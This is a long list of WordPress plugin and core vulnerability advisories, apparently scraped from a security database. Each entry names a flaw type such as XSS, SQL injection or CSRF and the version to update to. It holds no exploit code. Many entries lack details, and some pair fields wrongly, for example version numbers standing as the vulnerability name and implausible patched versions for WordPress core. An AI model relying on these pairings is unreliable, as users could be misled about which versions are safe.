Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 7.4.1
Recommended Action: Update to version 7.4.1, or a newer patched version

Plugin: Happy Addons for Elementor Pro

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.17.0
Recommended Action: Update to version 1.17.0, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Authenticated SQL Injection
Patched Version: 2.0.19
Recommended Action: Update to version 2.0.19, or a newer patched version

Plugin: Buy Me a Coffee – Button and Widget Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: Easy Cookies Policy

Plugin: Essential Addons for Elementor Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: Hospital Management System for WordPress

Vulnerability: SQL Injection
Patched Version: 22-05-2018
Recommended Action: Update to version 22-05-2018, or a newer patched version

Plugin: postTabs

Plugin: Slider by 10Web – Responsive Image Slider

Vulnerability: SQL Injection
Patched Version: 1.2.36
Recommended Action: Update to version 1.2.36, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.17.3
Recommended Action: Update to version 2.17.3, or a newer patched version

Plugin: MainWP WordPress SEO Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Captcha

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: SQL Injection
Patched Version: 3.0.10
Recommended Action: Update to version 3.0.10, or a newer patched version

Plugin: Sendit WP Newsletter

Plugin: Bugs Go Viral : Facebook Promotion Generator

Plugin: Subscribe to Comments

Vulnerability: Local File Includion
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: WP Site Protector

Plugin: MainWP Staging Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Authenticated (Subscriber+) CSV Injection
Patched Version: 5.1.8
Recommended Action: Update to version 5.1.8, or a newer patched version

Plugin: Stock in & out

Plugin: Voting Record

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via ‘license’ parameter
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Kraken.io Image Optimizer

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Plugin Options Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – Recurring Payments

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Download Manager

Vulnerability: IP Blocking Bypass
Patched Version: 3.2.50
Recommended Action: Update to version 3.2.50, or a newer patched version

Plugin: Local Development

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Authenticated Arbitrary Profile Creation and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: //// WP BORN BABIES PLUGIN ///

Plugin: WCP Contact Form

Plugin: Superior FAQ

Plugin: Analytics by BestWebSoft – Google Analytics Dashboard and Statistic Plugin for WordPress

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Advance WordPress Search Plugin

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Neon text

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: WCFM Marketplace – Multivendor Marketplace for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.6.3
Recommended Action: Update to version 3.6.3, or a newer patched version

Plugin: Image Gallery – Responsive Photo Gallery

Vulnerability: Responsive Photo Gallery <= 1.0.7
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Video Downloader for TikTok

Vulnerability: Directory Traversal
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Realty by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Markup (JSON-LD) structured in schema.org

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Content Repeater – Custom Posts Simplified

Plugin: Modern Events Calendar Lite

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 5.22.2
Recommended Action: Update to version 5.22.2, or a newer patched version

Plugin: Duplicator Pro

Vulnerability: Directory Traversal
Patched Version: 3.8.7.1
Recommended Action: Update to version 3.8.7.1, or a newer patched version

Plugin: Tweeple

Vulnerability: Reflected Cross-Site Scripting via id
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Nmedia WordPress Member Conversation

Vulnerability: Arbitrary File Upload
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection
Patched Version: 17.0.5
Recommended Action: Update to version 17.0.5, or a newer patched version

Core: WordPress

Plugin: Variation Swatches for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.62
Recommended Action: Update to version 1.0.62, or a newer patched version

Plugin: PixelYourSite – Your smart PIXEL (TAG) & API Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.3.1
Recommended Action: Update to version 9.3.1, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary File Upload
Patched Version: 2.8.6
Recommended Action: Update to version 2.8.6, or a newer patched version

Plugin: Image Gallery with Slideshow Plugin

Vulnerability: SQL Injection via selectMulGallery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Count per Day

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: Search & Filter

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.16
Recommended Action: Update to version 1.2.16, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Remote Code Execution
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Theme Test Drive

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Answer My Question

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina)

Vulnerability: Cross-Site Scripting
Patched Version: 5.2.3
Recommended Action: Update to version 5.2.3, or a newer patched version

Plugin: mTouch Quiz

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Travel Light

Plugin: Qe SEO Handyman

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.40
Recommended Action: Update to version 2.0.40, or a newer patched version

Core: WordPress

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting via Comments
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: CM Ad Changer – Ad Manager and Ad Server

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Return and Warranty Management System for WooCommerce

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Blocks
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: Job Board by BestWebSoft

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Cherry Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: oAuth Twitter Feed for Developers

Plugin: User Photo

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.5.2
Recommended Action: Update to version 0.9.5.2, or a newer patched version

Plugin: Feedweb

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: WordPress Automatic Plugin

Vulnerability: Cross-Site Request Forgery to SQL Injection
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: FluentSMTP – WP SMTP Plugin with Amazon SES, SendGrid, MailGun, Postmark, Google and Any SMTP Provider

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.6.9
Recommended Action: Update to version 7.6.9, or a newer patched version

Plugin: Check & Log Email – Easy Email Testing & Mail logging

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Import Legacy Media

Plugin: Pricing Tables WordPress Plugin – Easy Pricing Tables

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Template Kit Import
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: Contact Form Generator : Creative form builder for WordPress

Plugin: Simple Events Calendar

Vulnerability: Authenticated SQL Injection
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Floating Div

Plugin: Swatchly – WooCommerce Variation Swatches for Products (product attributes: Image swatch, Color swatches, Label swatches)

Vulnerability: Cross-Site Request Forgery via plugin_activation
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 4.1.7.2
Recommended Action: Update to version 4.1.7.2, or a newer patched version

Plugin: Contact Form 7 – Dynamic Text Extension

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Smart Slideshow

Plugin: Contact Form Email

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.3.12
Recommended Action: Update to version 1.3.12, or a newer patched version

Plugin: EMC2 Custom Help Videos

Plugin: Gallery – Image and Video Gallery with Thumbnails

Plugin: Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder

Vulnerability: Unauthenticated Arbitrary File Upload to Remote Code Execution
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Connect Matomo (WP-Matomo, WP-Piwik)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.29
Recommended Action: Update to version 1.0.29, or a newer patched version

Plugin: Quick Restaurant Menu

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: WP Meta and Date Remover

Vulnerability: Cross-Site Request Forgery via updateSettings
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: DB Backup

Vulnerability: Directory Traversal
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn)

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.5.15
Recommended Action: Update to version 7.5.15, or a newer patched version

Plugin: Gallery Metabox

Vulnerability: Missing Authorization via gallery_remove
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.7.1
Recommended Action: Update to version 4.7.1, or a newer patched version

Plugin: Porto Theme – Functionality

Vulnerability: Functionality <= 2.11.1
Patched Version: 2.12.1
Recommended Action: Update to version 2.12.1, or a newer patched version

Plugin: CM Download Manager – Document and File Management

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: IP Ban

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Backup and Restore WordPress – Backup Plugin

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: All in One Invite Codes

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.15
Recommended Action: Update to version 1.0.15, or a newer patched version

Plugin: CC Custom Taxonomy

Vulnerability: Authenticated (Administrator+) Cross Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: peepso-photos

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 6.3.1.0
Recommended Action: Update to version 6.3.1.0, or a newer patched version

Plugin: CF7 Google Sheets Connector

Vulnerability: Unauthenticated Sensitive Information Exposure via Debug Log
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: 404 Solution

Vulnerability: Sensitive Information Exposure
Patched Version: 2.33.1
Recommended Action: Update to version 2.33.1, or a newer patched version

Plugin: Youtube shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: WP Terms Popup – Terms and Conditions and Privacy Policy WordPress Popups

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: OAuth Single Sign On – SSO (OAuth Client)

Vulnerability: Authentication Bypass
Patched Version: 6.22.6
Recommended Action: Update to version 6.22.6, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Missing Authorization Checks
Patched Version: 2.0.22
Recommended Action: Update to version 2.0.22, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Commenter Emails

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: PDF Builder for WooCommerce. Create invoices,packing slips and more

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.104
Recommended Action: Update to version 1.2.104, or a newer patched version

Plugin: Antispam Bee

Vulnerability: IP Address Spoofing via get_client_ip
Patched Version: 2.11.4
Recommended Action: Update to version 2.11.4, or a newer patched version

Plugin: Joy Of Text Lite – SMS messaging for WordPress.

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WPS Cleaner

Vulnerability: Missing Authorization Checks
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Malware Scanner

Vulnerability: IP Spoofing
Patched Version: 4.7.2
Recommended Action: Update to version 4.7.2, or a newer patched version

Plugin: Similar Posts – Best Related Posts Plugin for WordPress

Plugin: 360 Product Rotation

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: WP Private Content Plus

Vulnerability: Unauthenticated Settings Change
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Filter Portfolio Gallery

Plugin: Video Thumbnails

Plugin: Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin

Vulnerability: Open Redirect via setup_plugin
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Cross-Site Request Forgery
Patched Version: 10.4.5
Recommended Action: Update to version 10.4.5, or a newer patched version

Plugin: Admin CSS MU

Vulnerability: Server-Side Request Forgery
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Contact Form by WD – responsive drag & drop contact form builder tool

Plugin: Slider a SlidersPack – Image Slider, Post Slider, ACF Gallery Slider

Vulnerability: Missing Authorization via wp_spaios_save_attachment_data
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Code Injection
Patched Version: 5.6
Recommended Action: Update to version 5.6, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: NitroPack – Caching & Speed Optimization for Core Web Vitals, Defer CSS & JS, Lazy load Images and CDN

Vulnerability: Missing Authorization via multiple AJAX functions
Patched Version: 1.10.0
Recommended Action: Update to version 1.10.0, or a newer patched version

Plugin: SendPress Newsletters

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 13.2.0
Recommended Action: Update to version 13.2.0, or a newer patched version

Plugin: Coupon Affiliates – Affiliate Plugin for WooCommerce

Vulnerability: Coupon Affiliates < 4.16.4.5
Patched Version: 4.16.4.5
Recommended Action: Update to version 4.16.4.5, or a newer patched version

Plugin: JS & CSS Script Optimizer

Plugin: amr users

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 4.59.4
Recommended Action: Update to version 4.59.4, or a newer patched version

Plugin: Chat Widget: Customer Support Button with SMS Call Button, Click to Chat Messenger, Live Chat Support Chat Button – Bit Assist

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: SmokeSignal

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: eRocket

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Tickera – WordPress Event Ticketing

Vulnerability: Cross-Site Request Forgery to Plugin Data Deletion & Settings Changes
Patched Version: 3.5.1.0
Recommended Action: Update to version 3.5.1.0, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Cross-Site Request Forgery to PHP Object Injection
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: WP Popup Builder – Popup Forms and Marketing Lead Generation

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.8.0
Recommended Action: Update to version 5.8.0, or a newer patched version

Plugin: WP Backup+

Plugin: Patreon WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authentication Bypass
Patched Version: 5.0.1.8
Recommended Action: Update to version 5.0.1.8, or a newer patched version

Plugin: ToolBar to Share

Plugin: SE HTML5 Album Audio Player

Core: WordPress

Vulnerability: Remote Code Execution
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: DMSGuestbook

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.0
Recommended Action: Update to version 1.9.0, or a newer patched version

Plugin: Team

Plugin: WP-Board

Plugin: TreePress – Easy Family Trees & Ancestor Profiles

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘post_title’ parameter
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Safe SVG

Vulnerability: Content-Type Bypass
Patched Version: 1.9.10
Recommended Action: Update to version 1.9.10, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 5.5.0
Recommended Action: Update to version 5.5.0, or a newer patched version

Plugin: WP VR – 360 Panorama and Free Virtual Tour Builder For WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.3.5
Recommended Action: Update to version 8.3.5, or a newer patched version

Plugin: Peter’s Math Anti-Spam

Vulnerability: CAPTCHA Bypass
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Upload Resume

Vulnerability: Captcha Bypass via resume_upload_form
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Prayer

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Ninja Tables – Easy Data Table Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 4.3.5
Recommended Action: Update to version 4.3.5, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: 4.9.6
Patched Version: 4.9.7
Recommended Action: Update to version 4.9.7, or a newer patched version

Plugin: Testimonial – Testimonial Slider and Showcase Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Bulk Price Update for Woocommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: Caldera Forms – More Than Contact Forms

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: WP Discord Invite

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.5.2
Recommended Action: Update to version 2.5.2, or a newer patched version

Plugin: wpCommentTwit

Plugin: Checkfront Online Booking System

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popups Builder

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: 1.16.9
Recommended Action: Update to version 1.16.9, or a newer patched version

Plugin: Menu Bar Cart Icon For WooCommerce By Binary Carpenter

Plugin: WP SEO TDK

Plugin: WP Coder – Code Snippets + HTML, CSS, JS and PHP Injection

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Timing Attack
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: moreAds SE

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Store Locator Plus® for WordPress

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.13.8
Recommended Action: Update to version 5.13.8, or a newer patched version

Plugin: Comment Blacklist Updater

Vulnerability: Cross-Site Request Forgery via update_blacklist_manual
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: wp-noexternallinks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.16
Recommended Action: Update to version 3.5.16, or a newer patched version

Plugin: Traffic Manager

Plugin: Merge + Minify + Refresh

Vulnerability: Cross-Site Request Forgery leading to Arbitrary File Deletion and Site Reset
Patched Version: 1.10.8
Recommended Action: Update to version 1.10.8, or a newer patched version

Plugin: Patreon WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: lim4wp

Plugin: Login as User or Customer

Vulnerability: Privilege Escalation
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Contact Form by WD – responsive drag & drop contact form builder tool

Vulnerability: Authorization Bypass
Patched Version: 1.7.19
Recommended Action: Update to version 1.7.19, or a newer patched version

Plugin: WP Glossary

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Scripting
Patched Version: 7.1.14
Recommended Action: Update to version 7.1.14, or a newer patched version

Plugin: WordPress Simple HTML Sitemap

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Very Simple Google Maps

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: Availability Calendar

Vulnerability: SQL Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: AMP extensions

Plugin: bbPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.5.9
Recommended Action: Update to version 2.5.9, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Missing Authorization
Patched Version: 0.8.5.8
Recommended Action: Update to version 0.8.5.8, or a newer patched version

Plugin: Custom Colors for Real Estate Manager

Plugin: Product Vendors

Vulnerability: Missing Authorization
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: Responsive Lightbox & Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: User Email Verification for WooCommerce

Vulnerability: Improper Access Control
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Shield: Blocks Bots, Protects Users, and Prevents Security Breaches

Vulnerability: Unauthenticated Stored Cross-Site Scripting via getColumnContent_Page
Patched Version: 18.5.8
Recommended Action: Update to version 18.5.8, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 4.9.3.3
Recommended Action: Update to version 4.9.3.3, or a newer patched version

Core: WordPress

Vulnerability: Information Disclosure
